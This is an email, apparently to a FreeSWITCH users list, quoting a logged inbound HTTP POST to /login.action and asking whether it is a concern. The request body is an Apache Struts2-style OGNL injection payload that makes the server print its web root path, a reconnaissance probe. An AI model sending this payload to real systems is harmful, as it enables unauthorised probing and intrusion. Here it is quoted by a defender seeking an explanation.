<div dir="ltr"><div>I saw this on the freeswitch console months ago and did not get around to following up on it until now.</div><div>A freeswitch profile is listening on :8080</div><div><br></div><div>a.b.c.d = remote address</div><div>w.x.y.z = freeswitch address</div><div><br></div><div>What is this?</div><div>Is it a concern?</div><div><br></div><div>recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:</div><div>   ------------------------------------------------------------------------</div><div>   POST /login.action HTTP/1.1</div><div>   User-Agent: Mozilla/5.0</div><div>   Accept: */*</div><div>   Content-Type: application/x-www-form-urlencoded</div><div>   Host: w.x.y.z:8080</div><div> </div><div>Content-Length: 395</div><div>   Expect: 100-continue</div><div>   Connection: Keep-Alive</div><div>   </div><div>   redirect:${%23res%3d%23context.get(&#39;com.opensymphony.xwork2.dispatcher.HttpServletResponse&#39;),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(&#39;com.opensymphony.xwork2.dispatcher.HttpServletRequest&#39;),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}</div><div><br></div></div>